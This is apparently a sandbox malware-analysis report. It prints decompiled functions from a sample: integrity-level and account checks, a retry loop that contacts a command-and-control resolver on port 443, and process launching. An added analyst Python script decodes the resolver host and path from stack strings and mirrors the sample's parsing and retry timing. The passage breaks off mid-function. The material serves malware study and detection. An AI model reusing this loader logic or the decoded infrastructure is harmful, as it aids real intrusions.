                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E006E26D0(intOrPtr* _a4, intOrPtr _a8, signed short* _a12) {
                          				void* _v16;
                          				char _v536;
                          				char _v1044;
                          				char _v1048;
                          				char _v1556;
                          				char _v1560;
                          				void _v1632;
                          				intOrPtr _v1636;
                          				char _v1694;
                          				signed short _v1696;
                          				char _v1712;
                          				struct _FILETIME _v1724;
                          				short _v1728;
                          				struct _SID_IDENTIFIER_AUTHORITY _v1732;
                          				char _v1736;
                          				char _v1740;
                          				intOrPtr _v1744;
                          				signed int _v1748;
                          				signed int _v1752;
                          				void* _v1756;
                          				void* _v1760;
                          				char _v1764;
                          				signed int _v1768;
                          				void* _t95;
                          				void* _t96;
                          				signed int _t109;
                          				signed int _t111;
                          				signed int _t112;
                          				signed int _t113;
                          				FILETIME* _t118;
                          				signed int _t129;
                          				signed int _t130;
                          				signed int _t131;
                          				signed int _t132;
                          				signed int* _t133;
                          				signed int _t138;
                          				signed int _t139;
                          				signed int _t140;
                          				signed int _t141;
                          				WCHAR* _t143;
                          				signed int _t147;
                          				WCHAR* _t154;
                          				intOrPtr* _t155;
                          				signed short* _t156;
                          				signed short* _t164;
                          				signed int _t165;
                          				signed short* _t166;
                          				signed short* _t167;
                          				signed short* _t168;
                          				BYTE[6] _t176;
                          				long _t181;
                          				intOrPtr _t184;
                          				signed int* _t185;
                          				signed short* _t186;
                          				signed short* _t188;
                          				void* _t192;
                          				void* _t193;
                          				signed int* _t194;
                          				void* _t195;
                          				void* _t196;
                          				struct _SYSTEMTIME* _t197;
                          				signed int* _t199;
                          				signed int* _t200;
                          				WCHAR* _t201;
                          				signed int _t203;
                          				signed int* _t205;
                          				signed int* _t209;
                          				signed int* _t211;
                          				signed int* _t212;
                          				signed int* _t216;
                          				signed int* _t217;
                          				signed int* _t221;
                          				signed int* _t222;
                          				signed int* _t223;
                          
                          				_t205 = (_t203 & 0xfffffff8) - 0x6d8;
                          				_t181 = 0;
                          				_t176 =  *0x6f9c34; // 0x0
                          				_v1756 = 0;
                          				_v1724.dwLowDateTime = 0;
                          				_v1760 = 0;
                          				_v1764 = 0x200;
                          				_v1768 = 0x200;
                          				_v1728 =  *0x6f9c38 & 0x0000ffff;
                          				_v1732.Value = _t176;
                          				if(_a8 == 0) {
                          					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v1756) == 0 || GetTokenInformation(_v1756, 1,  &_v1632, 0x4c,  &_v1724) == 0) {
                          						L33:
                          						_t95 = _v1760;
                          						if(_t95 != 0) {
                          							FreeSid(_t95);
                          						}
                          						_t96 = _v1756;
                          						if(_t96 != 0) {
                          							CloseHandle(_t96);
                          						}
                          						goto L37;
                          					} else {
                          						_push( &_v1740);
                          						_push(_t205);
                          						_push( &_v1560);
                          						_push( &_v1768);
                          						_push( &_v1048);
                          						_push(_v1636);
                          						L6:
                          						if(LookupAccountSidW(0, ??, ??, ??, ??, ??, ??) == 0) {
                          							_t181 = 0;
                          							L37:
                          							return _t181;
                          						}
                          						_t104 = _v1768;
                          						_t154 = 0;
                          						if(_v1768 != 0) {
                          							_t169 =  *_t205;
                          							_t154 = 0;
                          							if( *_t205 != 0) {
                          								_t143 = E006E3180(_t169 + _t104 + _t169 + _t104 + 4, 0);
                          								_t222 =  &(_t205[2]);
                          								_t154 = _t143;
                          								E006EC400(_t154,  &_v1560,  *_t222 +  *_t222);
                          								_t223 =  &(_t222[3]);
                          								_t147 =  *_t223;
                          								_t201 =  &(_t154[_t147]);
                          								_t32 = _t147 * 2; // 0x2
                          								 *_t201 = 0x5c;
                          								E006EC400(_t154 + _t32 + 2,  &_v1048, _v1768 + _v1768);
                          								_t205 =  &(_t223[3]);
                          								 *((short*)(_t201 + 2 + _v1768 * 2)) = 0;
                          							}
                          						}
                          						_t162 =  !=  ? 0x32 : 0x33;
                          						_v1756 = E006E5B70( !=  ? 0x32 : 0x33);
                          						_t184 = E006E3180(0x7d00, 0);
                          						_t109 = E006F4520(_t108, 0x34);
                          						_t209 =  &(_t205[5]);
                          						_t192 = _t184 + _t109 * 2;
                          						_v1744 = _t184;
                          						if(_a8 == 0) {
                          							_t193 = _t192 + E006F4520(_t192, 0x36) * 2;
                          							_t111 = E006F4520(_t193, 0x37);
                          							_t211 =  &(_t209[4]);
                          							_t194 = _t193 + _t111 * 2;
                          							_t112 =  *_t154 & 0x0000ffff;
                          							if(_t112 == 0) {
                          								L16:
                          								_t113 = E006F4520(_t194, 0x38);
                          								_t212 =  &(_t211[2]);
                          								_t195 = _t194 + _t113 * 2;
                          								_push(0x39);
                          								goto L17;
                          							}
                          							_t168 =  &(_t154[1]);
                          							do {
                          								 *_t194 = _t112;
                          								_t194 =  &(_t194[0]);
                          								_t112 =  *_t168 & 0x0000ffff;
                          								_t168 =  &(_t168[1]);
                          							} while (_t112 != 0);
                          							goto L16;
                          						} else {
                          							_t141 = E006F4520(_t192, 0x35);
                          							_t212 =  &(_t209[2]);
                          							_t195 = _t192 + _t141 * 2;
                          							_push(0x3a);
                          							L17:
                          							_push(_t195);
                          							_t196 = _t195 + E006F4520() * 2;
                          							_t185 = _t196 + E006F4520(_t196, 0x3b) * 2;
                          							_t197 =  &_v1712;
                          							GetLocalTime(_t197);
                          							SystemTimeToFileTime(_t197,  &_v1724);
                          							_t118 =  &_v1724;
                          							_t118->dwLowDateTime = _t118->dwLowDateTime + 0x23c34600;
                          							asm("adc dword [eax+0x4], 0x0");
                          							FileTimeToSystemTime(_t118, _t197);
                          							E006F4520( &_v536, 0x3c);
                          							_v1752 = _t197->wSecond & 0x0000ffff;
                          							_v1748 = _t197->wDay & 0x0000ffff;
                          							_push(_v1752);
                          							_push(_t197->wMinute & 0x0000ffff);
                          							_push(_t197->wHour & 0x0000ffff);
                          							_push(_v1748);
                          							_push(_t197->wMonth & 0x0000ffff);
                          							E006F68E0( &_v1696, 0x1a,  &_v536, _t197->wYear & 0x0000ffff);
                          							_t216 =  &(_t212[0xf]);
                          							_t129 = _v1696 & 0x0000ffff;
                          							if(_t129 == 0) {
                          								L20:
                          								_t130 = E006F4520(_t185, 0x3d);
                          								_t217 =  &(_t216[2]);
                          								_t164 = _v1756;
                          								_t199 = _t185 + _t130 * 2;
                          								_t131 =  *_t164 & 0x0000ffff;
                          								if(_t131 == 0) {
                          									L23:
                          									_t186 = _a12;
                          									if(_a8 != 0) {
                          										L28:
                          										_t155 = _a4;
                          										_t132 = E006F4520(_t199, 0x3e);
                          										_t165 =  *_t186 & 0x0000ffff;
                          										_t133 = _t199 + _t132 * 2;
                          										if(_t165 == 0) {
                          											L31:
                          											E006F4520(_t133, 0x3f);
                          											_t181 = 1;
                          											 *_t155 = _v1744;
                          											_t136 = _v1756;
                          											if(_v1756 != 0) {
                          												E006E91E0(_t136);
                          											}
                          											goto L33;
                          										}
                          										_t188 =  &(_t186[1]);
                          										do {
                          											 *_t133 = _t165;
                          											_t133 =  &(_t133[0]);
                          											_t165 =  *_t188 & 0x0000ffff;
                          											_t188 =  &(_t188[1]);
                          										} while (_t165 != 0);
                          										goto L31;
                          									}
                          									_t138 = E006F4520(_t199, 0x37);
                          									_t221 =  &(_t217[2]);
                          									_t200 = _t199 + _t138 * 2;
                          									_t139 =  *_t154 & 0x0000ffff;
                          									if(_t139 == 0) {
                          										L27:
                          										_t140 = E006F4520(_t200, 0x38);
                          										_t217 =  &(_t221[2]);
                          										_t199 = _t200 + _t140 * 2;
                          										goto L28;
                          									}
                          									_t156 =  &(_t154[1]);
                          									do {
                          										 *_t200 = _t139;
                          										_t200 =  &(_t200[0]);
                          										_t139 =  *_t156 & 0x0000ffff;
                          										_t156 =  &(_t156[1]);
                          									} while (_t139 != 0);
                          									goto L27;
                          								}
                          								_t166 =  &(_t164[1]);
                          								do {
                          									 *_t199 = _t131;
                          									_t199 =  &(_t199[0]);
                          									_t131 =  *_t166 & 0x0000ffff;
                          									_t166 =  &(_t166[1]);
                          								} while (_t131 != 0);
                          								goto L23;
                          							}
                          							_t167 =  &_v1694;
                          							do {
                          								 *_t185 = _t129;
                          								_t185 =  &(_t185[0]);
                          								_t129 =  *_t167 & 0x0000ffff;
                          								_t167 =  &(_t167[1]);
                          							} while (_t129 != 0);
                          							goto L20;
                          						}
                          					}
                          				}
                          				_t181 = 0;
                          				if(AllocateAndInitializeSid( &_v1732, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1760) == 0) {
                          					goto L33;
                          				} else {
                          					_push( &_v1736);
                          					_push(_t205);
                          					_push( &_v1556);
                          					_push( &_v1764);
                          					_push( &_v1044);
                          					_push(_v1760);
                          					goto L6;
                          				}
                          			}
                          Address column for the decompiled function above (one instruction address per C line, 0x006e26d9 to 0x006e2a93, 0x00000000 for goto/break lines; the per-line alignment of the side-by-side view was not preserved in extraction).

                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E272C
                          • GetCurrentProcess.KERNEL32 ref: 006E275D
                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 006E276B
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 006E278E
                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 006E27C2
                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006E290E
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 006E291A
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 006E2930
                            • Part of subcall function 006F68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 006F6A15
                          • FreeSid.ADVAPI32(?), ref: 006E2A75
                          • CloseHandle.KERNEL32(?), ref: 006E2A84
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Time$FileProcessSystemToken$AccountAllocateByteCharCloseCurrentFreeHandleInformationInitializeLocalLookupMultiOpenWide
                          • String ID:
                          • API String ID: 348365884-0
                          • Opcode ID: f6a88cd1faeaa45f44d2a4e3120a6c3534ef5a11075a5ed5f543605c325c2c25
                          • Instruction ID: 70ee357c066774062fb7043f14183b1eb7ed2124afb788040dbb5151295a0a7f
                          • Opcode Fuzzy Hash: f6a88cd1faeaa45f44d2a4e3120a6c3534ef5a11075a5ed5f543605c325c2c25
                          • Instruction Fuzzy Hash: 2AB1E4B1901352ABDB20DF15DC41BBB77EEEF90705F00481DFA89A7281EB75AA05C762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006EAB60(void* __edx, void* __eflags) {
                          				void* _t42;
                          				void* _t55;
                          				signed int _t59;
                          				signed int _t60;
                          				signed int _t61;
                          				signed int _t62;
                          				signed int _t63;
                          				signed int _t64;
                          				signed int _t65;
                          				signed int* _t72;
                          				signed int _t73;
                          				void* _t74;
                          				void* _t82;
                          				void* _t88;
                          				signed int _t90;
                          				signed int _t91;
                          				void* _t92;
                          				signed int _t96;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t99;
                          				signed int _t101;
                          				signed int _t104;
                          				signed int _t105;
                          				signed int* _t106;
                          
                          				_t88 = __edx;
                          				_t95 =  &(_t106[9]);
                          				E006ED8B0( &(_t106[9]));
                          				_t100 =  &(_t106[4]);
                          				_t72 =  &(_t106[0xf]);
                          				_t105 = 0;
                          				 *_t106 = 0;
                          				_t106[3] = 0;
                          				_t106[4] = 0;
                          				_t106[2] = 0;
                          				_t106[1] = 0;
                          				while(1) {
                          					_t106[0x10] = 0x6f692e;
                          					_t106[0xf] = 0x736e6462;
                          					_t42 = E006EC380(_t72, 0xfde9, _t100, 0xffffffff);
                          					_t106 =  &(_t106[4]);
                          					if(_t42 == 0) {
                          						break;
                          					}
                          					if(E006EF070(_t95, _t88, _t106[5], 0x1bb) == 0) {
                          						L6:
                          						_t105 = _t105 + 1;
                          						Sleep(0x4e20);
                          						if(_t105 < 0x1e) {
                          							continue;
                          						}
                          						break;
                          					}
                          					_t106[0x13] = 0x7261;
                          					_t106[0x12] = 0x7a61622e;
                          					_t106[0x11] = 0x74737572;
                          					_t106[0x10] = 0x74656661;
                          					_t106[0xf] = 0x732f722f;
                          					_t55 = E006EC380(_t72, 0xfde9,  &(_t106[3]), 0xffffffff);
                          					_t106 =  &(_t106[4]);
                          					if(_t55 == 0) {
                          						break;
                          					}
                          					if(E006E5A50(_t95, _t106[3],  &(_t106[7])) == 0 || _t106[7] != 0xc8) {
                          						goto L6;
                          					} else {
                          						_t59 = E006E7F10( &(_t106[9]),  &(_t106[1]),  &(_t106[8]));
                          						__eflags = _t59;
                          						if(_t59 == 0) {
                          							break;
                          						}
                          						_t90 = _t106[8];
                          						__eflags = _t90 - 7;
                          						if(_t90 < 7) {
                          							break;
                          						}
                          						_t60 = _t106[1];
                          						__eflags = _t90;
                          						_t82 = _t60 + _t90;
                          						if(_t90 <= 0) {
                          							L21:
                          							__eflags = _t60 - _t82;
                          							_t91 = _t60;
                          							if(_t60 >= _t82) {
                          								L26:
                          								_t92 = _t91 - _t60;
                          								__eflags = _t92 - 7 - 8;
                          								if(_t92 - 7 > 8) {
                          									break;
                          								}
                          								_t61 = E006EC380(_t60, 0,  &(_t106[3]), _t92);
                          								_t106 =  &(_t106[4]);
                          								_t73 = _t106[0x2d];
                          								__eflags = _t61;
                          								if(_t61 == 0) {
                          									break;
                          								}
                          								_t101 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									_t62 = E006F6BD0(_t73, _t92, __eflags, _t106[4], 0x1bb);
                          									__eflags = _t62;
                          									if(_t62 != 0) {
                          										break;
                          									}
                          									_t101 = _t101 + 1;
                          									Sleep(0x7530);
                          									__eflags = _t101 - 0x14;
                          									if(__eflags < 0) {
                          										continue;
                          									}
                          									__eflags = _t101 - 0x14;
                          									 *_t106 = 0;
                          									if(_t101 == 0x14) {
                          										goto L7;
                          									}
                          									break;
                          								}
                          								_t102 =  &(_t106[6]);
                          								_t96 = 0;
                          								__eflags = 0;
                          								_t106[6] = 0;
                          								while(1) {
                          									_t63 = E006E5960(__eflags, _t73, _t102);
                          									_t106 =  &(_t106[2]);
                          									__eflags = _t63;
                          									if(_t63 == 0) {
                          										break;
                          									}
                          									_t96 = _t96 + 1;
                          									Sleep(0x7530);
                          									__eflags = _t96 - 0x14;
                          									if(__eflags < 0) {
                          										continue;
                          									}
                          									if(__eflags != 0) {
                          										L39:
                          										_t103 =  &(_t106[5]);
                          										_t98 = 0;
                          										__eflags = 0;
                          										_t106[5] = 0;
                          										while(1) {
                          											_t64 = E006E3C40(_t73, _t103);
                          											_t106 =  &(_t106[2]);
                          											__eflags = _t64;
                          											if(_t64 == 0) {
                          												break;
                          											}
                          											_t98 = _t98 + 1;
                          											Sleep(0x7530);
                          											__eflags = _t98 - 0x14;
                          											if(__eflags < 0) {
                          												continue;
                          											}
                          											if(__eflags != 0) {
                          												L46:
                          												_t104 = 0;
                          												__eflags = 0;
                          												while(1) {
                          													_t65 = E006E9060(_t73, 0x6f9ac8);
                          													_t106 =  &(_t106[2]);
                          													__eflags = _t65;
                          													if(_t65 != 0) {
                          														break;
                          													}
                          													_t104 = _t104 + 1;
                          													Sleep(0x7530);
                          													__eflags = _t104 - 0x64;
                          													if(_t104 < 0x64) {
                          														continue;
                          													}
                          													break;
                          												}
                          												__eflags = _t104 - 0x64;
                          												 *_t106 = 0 | _t104 != 0x00000064;
                          												goto L7;
                          											}
                          											L43:
                          											 *_t106 = 0;
                          											goto L7;
                          										}
                          										_t99 = _t106[5];
                          										__eflags = _t99;
                          										if(_t99 != 0) {
                          											E006E9510(_t99);
                          											L006F7400(_t99);
                          											_t106 =  &(_t106[1]);
                          										}
                          										goto L46;
                          									}
                          									goto L43;
                          								}
                          								_t97 = _t106[6];
                          								__eflags = _t97;
                          								if(_t97 != 0) {
                          									L006F1F70(_t63);
                          									L006F7400(_t97);
                          									_t106 =  &(_t106[1]);
                          								}
                          								goto L39;
                          							}
                          							_t91 = _t60;
                          							do {
                          								_t74 =  *_t91;
                          								__eflags = _t74 - 0x2e;
                          								if(_t74 == 0x2e) {
                          									goto L25;
                          								}
                          								__eflags = _t74 + 0xd0 - 9;
                          								if(_t74 + 0xd0 > 9) {
                          									goto L26;
                          								}
                          								L25:
                          								_t91 = _t91 + 1;
                          								__eflags = _t91 - _t82;
                          							} while (_t91 < _t82);
                          							goto L26;
                          						} else {
                          							goto L19;
                          						}
                          						while(1) {
                          							L19:
                          							__eflags =  *_t60 + 0xd0 - 0xa;
                          							if( *_t60 + 0xd0 < 0xa) {
                          								goto L21;
                          							}
                          							_t60 = _t60 + 1;
                          							__eflags = _t60 - _t82;
                          							if(_t60 < _t82) {
                          								continue;
                          							}
                          							goto L21;
                          						}
                          						goto L21;
                          					}
                          				}
                          				L7:
                          				_t43 = _t106[3];
                          				if(_t106[3] != 0) {
                          					E006E91E0(_t43);
                          					_t106 =  &(_t106[1]);
                          				}
                          				_t44 = _t106[4];
                          				if(_t106[4] != 0) {
                          					E006E91E0(_t44);
                          					_t106 =  &(_t106[1]);
                          				}
                          				_t45 = _t106[2];
                          				if(_t106[2] != 0) {
                          					E006E91E0(_t45);
                          					_t106 =  &(_t106[1]);
                          				}
                          				_t46 = _t106[1];
                          				if(_t106[1] != 0) {
                          					E006E91E0(_t46);
                          					_t106 =  &(_t106[1]);
                          				}
                          				E006F19C0( &(_t106[9]));
                          				return  *_t106;
                          			}
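The Python below is an added analyst re-implementation of the resolution-and-connect logic as read from E006EAB60 above; it is not code from the sample, from Joe Sandbox, or from any project, and it exists only to make the decompiled constants readable and to show what the response parser will and will not accept. It takes the DWORD constants stored at _t106[0xf].._t106[0x13] as little-endian ASCII stack strings, reads 0x1bb as TCP port 443, 0xc8 as HTTP status 200, and the L19..L26 scan as "first run of digits and dots with length 7..15 (the unsigned `_t92 - 7 > 8` check)"; those readings, and the function names and the sample response bodies, are the author's assumptions and constructions, not statements the report makes. The retry constants are also from the decompilation: Sleep(0x4e20) is 20 s for up to 0x1e (30) attempts, Sleep(0x7530) is 30 s for up to 0x14 (20) or 0x64 (100) attempts.

```python
"""Analyst re-implementation of the resolver logic seen in E006EAB60.

Constants are copied from the decompilation; the interpretation of them as
a host, a path, a port and a status code is an assumption, not a fact the
sandbox report states.
"""
import struct

# Stack string slots _t106[0xf].._t106[0x10] (first build) and
# _t106[0xf].._t106[0x13] (second build), in increasing address order.
RESOLVER_HOST_DWORDS = [0x736E6462, 0x006F692E]
RESOLVER_PATH_DWORDS = [0x732F722F, 0x74656661, 0x74737572, 0x7A61622E, 0x00007261]

PORT = 0x1BB            # assumed TCP port passed to E006EF070 / E006F6BD0
EXPECTED_STATUS = 0xC8  # assumed HTTP status compared at _t106[7]
MIN_LEN, MAX_LEN = 7, 15  # `_t90 < 7` and unsigned `_t92 - 7 > 8`

# Retry budget per stage (Sleep argument in ms, attempt count).
RETRY_SCHEDULE = {
    "resolver_connect": (0x4E20, 0x1E),   # 20 s x 30
    "peer_connect":     (0x7530, 0x14),   # 30 s x 20
    "peer_stage_1":     (0x7530, 0x14),   # 30 s x 20
    "peer_stage_2":     (0x7530, 0x14),   # 30 s x 20
    "final_stage":      (0x7530, 0x64),   # 30 s x 100
}


def decode_stack_string(dwords):
    """Decode DWORD constants written to consecutive stack slots.

    Each slot is little-endian; the string ends at the first NUL byte.
    """
    raw = b"".join(struct.pack("<I", d) for d in dwords)
    return raw.split(b"\x00", 1)[0].decode("ascii")


def resolver_url():
    """Assumed URL the sample requests before connecting to the peer."""
    scheme = "https" if PORT == 443 else "http"
    return f"{scheme}://{decode_stack_string(RESOLVER_HOST_DWORDS)}" \
           f"{decode_stack_string(RESOLVER_PATH_DWORDS)}"


def extract_peer_candidate(body: bytes):
    """Mirror the L19..L26 scan over the response body.

    1. Skip forward to the first ASCII digit (`*_t60 + 0xd0 < 0xa`).
    2. Take the run of digits and '.' from there (`_t74 == 0x2e` or digit).
    3. Accept only if the run length is 7..15.
    The sample never checks that the token is a well-formed IPv4 address, so a
    bare run of digits of the right length is accepted too.
    """
    n = len(body)
    if n < MIN_LEN:                      # `_t90 < 7` -> break
        return None
    i = 0
    while i < n and not 0x30 <= body[i] <= 0x39:
        i += 1
    j = i
    while j < n and (body[j] == 0x2E or 0x30 <= body[j] <= 0x39):
        j += 1
    length = j - i
    if not MIN_LEN <= length <= MAX_LEN:  # unsigned `_t92 - 7 > 8` -> break
        return None
    return body[i:j].decode("ascii")


def peer_from_response(status: int, body: bytes):
    """Apply the status check (`_t106[7] != 0xc8` -> retry) then the scan."""
    if status != EXPECTED_STATUS:
        return None
    return extract_peer_candidate(body)


def max_wait_seconds(stage: str) -> int:
    """Worst-case time one retry loop can spend sleeping."""
    sleep_ms, attempts = RETRY_SCHEDULE[stage]
    return sleep_ms * attempts // 1000


if __name__ == "__main__":
    print(resolver_url())
    # Constructed sample bodies; 192.0.2.10 is a documentation address.
    for sample in (b"constructed: 192.0.2.10\n", b"build 20191021\n", b"x 1.2.3 y"):
        print(sample, "->", peer_from_response(200, sample))
```

The parser shows why a defender should not assume the returned peer is a dotted quad: any 7 to 15 byte run of digits and dots after the first digit passes, so a resolver page that happens to contain a build number or date would be handed to the connect routine on port 443. The retry budgets (10 minutes for the resolver, 10 minutes per peer stage, 50 minutes for the final stage) are the upper bound on how long the process lingers if the infrastructure is down, which is useful when sizing a detonation timeout.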
                          Address column for E006EAB60 (one instruction address per C line, 0x006eab60 to 0x006eae24, 0x00000000 for goto/break lines; the per-line alignment of the side-by-side view was not preserved in extraction).

                          APIs
                            • Part of subcall function 006ED8B0: InitializeCriticalSectionAndSpinCount.KERNEL32(006F9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 006ED916
                            • Part of subcall function 006ED8B0: RtlEnterCriticalSection.NTDLL(006F9B64), ref: 006ED928
                            • Part of subcall function 006ED8B0: RtlLeaveCriticalSection.NTDLL(006F9B64), ref: 006ED93C
                            • Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,006E8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 006EC396
                            • Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 006EC3C4
                          • Sleep.KERNEL32(00004E20,?,000001BB), ref: 006EAC3A
                          • Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EAD44
                          • Sleep.KERNEL32(00007530,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EAD7F
                          • Sleep.KERNEL32(00007530,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EADC6
                          • Sleep.KERNEL32(00007530,?,?,?,?,?,000001BB,?,?,?,?,?,?,?,000001BB), ref: 006EAE11
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Sleep$CriticalSection$ByteCharMultiWide$CountEnterInitializeLeaveSpin
                          • String ID: .baz$/r/s$afet$ar$rust
                          • API String ID: 2543766595-2414577613
                          • Opcode ID: fdc481246d52ed2a1afe8cc3fdfe000b5b7d1e4bacc1fff1de8f90b09117cb2c
                          • Instruction ID: 1e16d4bff09145ca9ca467f34ee1679bb0a3d7f4847fa490fceb4d06317a26c6
                          • Opcode Fuzzy Hash: fdc481246d52ed2a1afe8cc3fdfe000b5b7d1e4bacc1fff1de8f90b09117cb2c
                          • Instruction Fuzzy Hash: B071F4B16063819BD720AB67DC45BABB7EBAF80B40F24481CF48587291E730E905C757
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E006E43E0(void* __ecx, void* __eflags) {
                          				void* _t49;
                          				void* _t50;
                          				int _t58;
                          				intOrPtr _t59;
                          				WCHAR* _t60;
                          				short* _t61;
                          				intOrPtr _t64;
                          				signed int _t73;
                          				void* _t77;
                          				WCHAR* _t78;
                          				signed int _t79;
                          				WCHAR* _t81;
                          				intOrPtr _t87;
                          				intOrPtr _t88;
                          				signed int _t89;
                          				signed int _t93;
                          				signed int _t94;
                          				WCHAR* _t98;
                          				void* _t99;
                          				struct _STARTUPINFOW* _t100;
                          				void* _t101;
                          				void* _t102;
                          				intOrPtr* _t103;
                          				void* _t104;
                          				void* _t105;
                          
                          				_t105 = __eflags;
                          				_t77 = _t102;
                          				_t99 = __ecx;
                          				E006F6610(_t77, 0, 0x56c);
                          				_t103 = _t102 + 0xc;
                          				_push(0);
                          				_push(0);
                          				if(E006EFA90(_t99, _t105, 0, _t77, 0) == 0 ||  *_t103 == 0) {
                          					L26:
                          					_t49 =  *(_t103 + 0x4c);
                          					if(_t49 != 0) {
                          						CloseHandle(_t49);
                          					}
                          					_t50 =  *(_t103 + 0x50);
                          					if(_t50 != 0) {
                          						CloseHandle(_t50);
                          					}
                          					_t51 =  *_t103;
                          					if( *_t103 != 0) {
                          						E006E91E0(_t51);
                          						_t103 = _t103 + 4;
                          					}
                          					return  *((intOrPtr*)(_t103 + 4));
                          				} else {
                          					_t100 = _t103 + 8;
                          					_t100->cb = 0x44;
                          					GetStartupInfoW(_t100);
                          					if( *((intOrPtr*)(_t103 + 0x580)) == 0) {
                          						L23:
                          						_t58 = CreateProcessW( *(_t103 + 0x4c - 0x4c), 0, 0, 0, 0, 0, 0, 0, _t100, _t103 + 0x4c);
                          						_t59 =  *0x6f9b0c; // 0x2ef350
                          						if(_t58 == 0) {
                          							 *((intOrPtr*)(_t59 + 8)) = 7;
                          						} else {
                          							 *((intOrPtr*)(_t59 + 8)) = 1;
                          							 *((intOrPtr*)(_t103 + 4)) = 1;
                          						}
                          						goto L26;
                          					}
                          					_t87 =  *0x6f9ac0; // 0x2f87c8
                          					_t98 = _t103 + 0x6c;
                          					_t60 = _t98;
                          					 *(_t98 - 4) = _t98;
                          					 *((intOrPtr*)(_t98 - 8)) = _t87;
                          					if(_t87 == 0) {
                          						L9:
                          						_t88 =  *0x6f9bac; // 0x306478
                          						 *_t60 = 0x2c;
                          						_t61 =  &(_t60[1]);
                          						 *(_t103 + 0x68) = _t61;
                          						 *((intOrPtr*)(_t103 + 0x64)) = _t88;
                          						if(_t88 == 0) {
                          							L15:
                          							 *_t61 = 0x2c;
                          							 *(_t103 + 0x68) =  &(_t61[1]);
                          							E006E9D40( &(_t61[1]));
                          							_t64 = E006EB7A0( *0x6f9b84);
                          							_t104 = _t103 + 4;
                          							 *((intOrPtr*)(_t104 + 0x64)) = _t64;
                          							if(_t64 == 0) {
                          								L22:
                          								_t78 = _t104 + 0x46c;
                          								 *((short*)( *((intOrPtr*)(_t78 - 0x404)))) = 0;
                          								E006F4520(_t78, 0x59);
                          								_t103 = _t104 + 8;
                          								SetEnvironmentVariableW(_t78, _t98);
                          								goto L23;
                          							}
                          							_t89 = 0xfffffffe;
                          							_t93 = 0;
                          							while( *((short*)(_t64 + _t93 * 2)) != 0) {
                          								_t93 = _t93 + 1;
                          								_t89 = _t89 + 0xfffffffe;
                          								if(_t93 != 0x20) {
                          									continue;
                          								}
                          								 *(_t104 + 0x60) = 0;
                          								 *(_t104 + 0x5c) = 0x80070057;
                          								L21:
                          								E006E91E0(_t64);
                          								_t104 = _t104 + 4;
                          								goto L22;
                          							}
                          							 *(_t104 + 0x60) = _t93;
                          							 *(_t104 + 0x5c) = 0;
                          							E006EC400( *((intOrPtr*)(_t104 + 0x70)), _t64,  ~_t89);
                          							_t104 = _t104 + 0xc;
                          							_t64 =  *((intOrPtr*)(_t104 + 0x64));
                          							_t35 = _t104 + 0x68;
                          							 *_t35 =  *(_t104 + 0x68) +  *(_t104 + 0x60) +  *(_t104 + 0x60);
                          							__eflags =  *_t35;
                          							goto L21;
                          						}
                          						_t94 = 0xfffffffe;
                          						_t79 = 0;
                          						while( *((short*)(_t88 + _t79 * 2)) != 0) {
                          							_t79 = _t79 + 1;
                          							_t94 = _t94 + 0xfffffffe;
                          							if(_t79 != 0x80) {
                          								continue;
                          							}
                          							 *(_t103 + 0x60) = 0;
                          							 *(_t103 + 0x5c) = 0x80070057;
                          							goto L15;
                          						}
                          						 *(_t103 + 0x60) = _t79;
                          						 *(_t103 + 0x5c) = 0;
                          						E006EC400(_t61, _t88,  ~_t94);
                          						_t103 = _t103 + 0xc;
                          						_t61 =  *(_t103 + 0x60) +  *(_t103 + 0x60) +  *(_t103 + 0x68);
                          						__eflags = _t61;
                          						 *(_t103 + 0x68) = _t61;
                          						goto L15;
                          					}
                          					_t73 = 0;
                          					_t101 = 0;
                          					while( *((short*)(_t87 + _t73 * 2)) != 0) {
                          						_t73 = _t73 + 1;
                          						_t101 = _t101 + 0xfffffffe;
                          						if(_t73 != 0x80) {
                          							continue;
                          						}
                          						 *(_t103 + 0x60) = 0;
                          						 *(_t103 + 0x5c) = 0x80070057;
                          						_t60 = _t98;
                          						goto L9;
                          					}
